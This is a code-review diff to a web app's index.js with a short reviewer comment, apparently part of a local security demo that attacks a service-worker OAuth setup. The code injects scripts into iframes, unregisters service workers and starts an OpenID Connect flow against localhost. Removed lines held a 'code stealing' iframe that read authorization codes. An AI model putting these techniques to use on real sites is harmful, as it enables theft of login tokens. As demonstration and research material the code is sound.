web/src/index.js

```diff
@@ -23,56 +25,80 @@ const registerServiceWorker = async () => {
     }
 };
 
-const startApplication = () => {
+const startApplication = async () => {
 
-    function createIframe(src, script) {
+    function createIframe(src, scriptFactory) {
         const iframe = document.createElement('iframe');
         iframe.setAttribute('src', src); // Initialize with an empty page
         iframe.setAttribute('width', '500');
         iframe.setAttribute('height', '300');
         document.body.appendChild(iframe);
 
-        iframe.addEventListener('load', function () {
+        const rand = (Math.random() + 1).toString(36).substring(7);
+        const scriptContent = scriptFactory(rand);
+
+        function injectScript() {
             // Access the iframe's document object
             const iframeDocument = iframe.contentDocument || iframe.contentWindow.document;
 
             // Create a new script element
             const scriptElement = iframeDocument.createElement('script');
 
             // Set the script's content with your custom code
-            scriptElement.textContent = script;
+            scriptElement.textContent = scriptContent;
 
             // Append the script to the iframe's document
             iframeDocument.body.appendChild(scriptElement);
+        }
+
+        // injectScript();
+
+        iframe.addEventListener('load', function () {
+            injectScript();
         });
     }
 
-    createIframe('about:blank', `
+
+    createIframe(`${window.location.origin}/xxx.html#attack2`,
+        rand => `
             console.log('[Attack] Attack 2: trying to unregister service workers from iframe');
             navigator.serviceWorker.getRegistrations().then(registrations => {
-            for (const registration of registrations) {
-                console.log('[I] Service worker registration: ', registration);
+               for (const registration of registrations) {
+                    console.log('[I] Service worker registration: ', registration);
                     registration.unregister();
                 }
             });
+            document.href = 'http://localhost:7218/realms/swdemo/protocol/openid-connect/auth?client_id=swtest&response_type=code&scope=openid&redirect_uri=http://localhost:7280/xxx.html#attack2';
         `);
 
-    createIframe('http://localhost:7218/realms/swdemo/protocol/openid-connect/auth?client_id=swtest&response_type=code&scope=openid&redirect_uri=http://localhost:7280/xxx.html', `
-            const url = new URL(window.location.href);
-            const code = url.searchParams?.get('code');
-            console.log('[Attack] running in code stealing iframe, code: ', code);
-        `);
 
     console.log('[Attack] Attack 1: trying to unregister service workers');
-    navigator.serviceWorker.getRegistrations().then(registrations => {
-        for (const registration of registrations) {
+    await navigator.serviceWorker.getRegistrations().then(registrations => {
```

Comment:
wanted to make sure sw unregistration was completed before attempting new auth flow